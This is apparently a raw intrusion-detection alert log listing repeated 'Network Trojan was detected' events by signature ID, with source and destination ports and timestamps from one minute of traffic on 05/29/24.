                SID:2835222
                Source Port:56962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.990433
                SID:2829579
                Source Port:48138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.587470
                SID:2829579
                Source Port:51910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.731249
                SID:2829579
                Source Port:56452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.702366
                SID:2829579
                Source Port:37292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.615309
                SID:2829579
                Source Port:60610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.556114
                SID:2835222
                Source Port:35032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140877
                SID:2835222
                Source Port:50638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.583967
                SID:2829579
                Source Port:47424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.180360
                SID:2835222
                Source Port:51896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464677
                SID:2835222
                Source Port:43122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.900204
                SID:2835222
                Source Port:59330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653101
                SID:2835222
                Source Port:47626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.964468
                SID:2835222
                Source Port:56892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557245
                SID:2829579
                Source Port:42460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.507319
                SID:2829579
                Source Port:42440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767683
                SID:2835222
                Source Port:58972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.211938
                SID:2835222
                Source Port:40874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.823461
                SID:2829579
                Source Port:40726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519737
                SID:2835222
                Source Port:35950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559459
                SID:2835222
                Source Port:42664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.628709
                SID:2829579
                Source Port:56178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655265
                SID:2829579
                Source Port:35854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.585994
                SID:2829579
                Source Port:41346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.160424
                SID:2829579
                Source Port:35352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.941514
                SID:2835222
                Source Port:37866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968215
                SID:2835222
                Source Port:37444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.702410
                SID:2835222
                Source Port:55162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.267843
                SID:2829579
                Source Port:45048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.858437
                SID:2829579
                Source Port:60640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.445664
                SID:2829579
                Source Port:51630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264825
                SID:2829579
                Source Port:42922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.042064
                SID:2835222
                Source Port:58336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.611236
                SID:2829579
                Source Port:40942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.731299
                SID:2835222
                Source Port:51950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.804924
                SID:2835222
                Source Port:40190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.836034
                SID:2835222
                Source Port:52230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.887486
                SID:2829579
                Source Port:57126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.338679
                SID:2829579
                Source Port:36620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141203
                SID:2829579
                Source Port:36492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.639640
                SID:2829579
                Source Port:47696
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.782309
                SID:2829579
                Source Port:54900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.091282
                SID:2829579
                Source Port:36980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.810549
                SID:2835222
                Source Port:48258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.773570
                SID:2829579
                Source Port:39036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.903548
                SID:2829579
                Source Port:36686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.133864
                SID:2829579
                Source Port:58024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.278527
                SID:2835222
                Source Port:34738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.856765
                SID:2835222
                Source Port:33836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.975805
                SID:2829579
                Source Port:35388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281190
                SID:2835222
                Source Port:43192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.665986
                SID:2835222
                Source Port:54068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.416524
                SID:2829579
                Source Port:35580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.538372
                SID:2829579
                Source Port:45980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.988977
                SID:2829579
                Source Port:54210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.236744
                SID:2835222
                Source Port:59636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.565065
                SID:2829579
                Source Port:43830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.688234
                SID:2835222
                Source Port:53250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.380472
                SID:2835222
                Source Port:43594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.002189
                SID:2835222
                Source Port:52668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335798
                SID:2835222
                Source Port:50044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.860021
                SID:2829579
                Source Port:48050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.222116
                SID:2835222
                Source Port:35680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.953160
                SID:2835222
                Source Port:58772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.022093
                SID:2835222
                Source Port:49380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.977656
                SID:2829579
                Source Port:33288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.683678
                SID:2829579
                Source Port:50808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.175010
                SID:2829579
                Source Port:43546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.734796
                SID:2835222
                Source Port:44306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584243
                SID:2829579
                Source Port:47792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519032
                SID:2835222
                Source Port:54162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.857274
                SID:2829579
                Source Port:43918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.543482
                SID:2835222
                Source Port:50446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.905228
                SID:2835222
                Source Port:37068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.780703
                SID:2829579
                Source Port:50310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.958491
                SID:2835222
                Source Port:44604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.572887
                SID:2835222
                Source Port:49162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.714241
                SID:2829579
                Source Port:57060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.068276
                SID:2829579
                Source Port:50658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.873418
                SID:2829579
                Source Port:42572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.420230
                SID:2835222
                Source Port:50598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.555387
                SID:2829579
                Source Port:58656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.463589
                SID:2835222
                Source Port:39416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.276508
                SID:2829579
                Source Port:51722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.916693
                SID:2829579
                Source Port:38566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385476
                SID:2835222
                Source Port:47460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.925380
                SID:2835222
                Source Port:47202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.967630
                SID:2835222
                Source Port:43676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521441
                SID:2835222
                Source Port:33882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.022514
                SID:2835222
                Source Port:46374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.787056
                SID:2835222
                Source Port:59934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.916169
                SID:2835222
                Source Port:37542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.779520
                SID:2829579
                Source Port:41134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766828
                SID:2829579
                Source Port:39300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.419811
                SID:2829579
                Source Port:34160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766967
                SID:2829579
                Source Port:48750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.811747
                SID:2829579
                Source Port:47324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.910792
                SID:2835222
                Source Port:47152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655962
                SID:2829579
                Source Port:46826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.001226
                SID:2829579
                Source Port:45748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.957958
                SID:2829579
                Source Port:44788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.613291
                SID:2835222
                Source Port:55318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.990490
                SID:2829579
                Source Port:42420
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.179787
                SID:2829579
                Source Port:56690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574364
                SID:2829579
                Source Port:41690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.154501
                SID:2829579
                Source Port:33114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.514722
                SID:2835222
                Source Port:42596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.801447
                SID:2829579
                Source Port:53674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.570819
                SID:2829579
                Source Port:35406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675378
                SID:2829579
                Source Port:51262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.778192
                SID:2835222
                Source Port:47932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265514
                SID:2835222
                Source Port:37730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.154974
                SID:2829579
                Source Port:54494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.809298
                SID:2829579
                Source Port:40854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782455
                SID:2829579
                Source Port:51394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612168
                SID:2829579
                Source Port:50076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.639455
                SID:2829579
                Source Port:42746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.943576
                SID:2829579
                Source Port:41588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023840
                SID:2835222
                Source Port:56608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136887
                SID:2835222
                Source Port:42002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266043
                SID:2835222
                Source Port:53602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.462262
                SID:2829579
                Source Port:34368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.711892
                SID:2835222
                Source Port:34548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.226927
                SID:2829579
                Source Port:53796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.165726
                SID:2829579
                Source Port:33056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899402
                SID:2835222
                Source Port:55028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766993
                SID:2835222
                Source Port:37280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.080740
                SID:2829579
                Source Port:38870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.510995
                SID:2829579
                Source Port:55288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.175043
                SID:2829579
                Source Port:56458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.727298
                SID:2829579
                Source Port:42516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.320449
                SID:2835222
                Source Port:37688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.419586
                SID:2829579
                Source Port:37974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.556237
                SID:2835222
                Source Port:45700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.844268
                SID:2829579
                Source Port:39342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.165886
                SID:2829579
                Source Port:45818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.726231
                SID:2835222
                Source Port:44180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.137001
                SID:2829579
                Source Port:48130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.419375
                SID:2835222
                Source Port:57496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.781766
                SID:2829579
                Source Port:38426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.868220
                SID:2829579
                Source Port:49622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.863758
                SID:2829579
                Source Port:56858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.221025
                SID:2835222
                Source Port:58610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.442596
                SID:2829579
                Source Port:44606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.024463
                SID:2835222
                Source Port:54792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.953120
                SID:2835222
                Source Port:55466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.904161
                SID:2829579
                Source Port:46756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.629812
                SID:2835222
                Source Port:42666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.411462
                SID:2030490
                Source Port:55148
                Destination Port:1235
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464565
                SID:2829579
                Source Port:55466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.466073
                SID:2835222
                Source Port:50912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385343
                SID:2835222
                Source Port:36300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.799345
                SID:2829579
                Source Port:48172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.664909
                SID:2829579
                Source Port:52580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.262539
                SID:2835222
                Source Port:56160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.978769
                SID:2835222
                Source Port:59776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.669424
                SID:2829579
                Source Port:45746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.909963
                SID:2835222
                Source Port:53032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.612359
                SID:2829579
                Source Port:42798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266945
                SID:2829579
                Source Port:37980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.738458
                SID:2829579
                Source Port:36278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.571945
                SID:2829579
                Source Port:34840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.997349
                SID:2829579
                Source Port:42248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.661001
                SID:2835222
                Source Port:53484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870202
                SID:2829579
                Source Port:43148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.815008
                SID:2829579
                Source Port:53232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667092
                SID:2829579
                Source Port:43530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042041
                SID:2829579
                Source Port:37856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.534752
                SID:2829579
                Source Port:59054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.900125
                SID:2829579
                Source Port:47558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.266632
                SID:2829579
                Source Port:51392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.510959
                SID:2835222
                Source Port:50130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.902849
                SID:2829579
                Source Port:50016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.228226
                SID:2835222
                Source Port:49706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.239430
                SID:2835222
                Source Port:52474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.001286
                SID:2835222
                Source Port:47426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.179656
                SID:2835222
                Source Port:35702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.664253
                SID:2835222
                Source Port:48054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.538150
                SID:2835222
                Source Port:44900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.133327
                SID:2829579
                Source Port:56404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.687317
                SID:2835222
                Source Port:59714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.084465
                SID:2829579
                Source Port:36470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.976403
                SID:2835222
                Source Port:60254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.947533
                SID:2829579
                Source Port:50582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.979213
                SID:2835222
                Source Port:57272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.567262
                SID:2835222
                Source Port:44196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.101672
                SID:2835222
                Source Port:54912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.432561
                SID:2829579
                Source Port:41864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.652189
                SID:2835222
                Source Port:47788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.896437
                SID:2829579
                Source Port:43464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.731854
                SID:2829579
                Source Port:34790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.227947
                SID:2835222
                Source Port:35004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.318733
                SID:2835222
                Source Port:33272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.558161
                SID:2835222
                Source Port:47188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.985420
                SID:2829579
                Source Port:59892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654214
                SID:2835222
                Source Port:48056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.535763
                SID:2829579
                Source Port:37472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.499776
                SID:2829579
                Source Port:39038
                Destination Port:37215
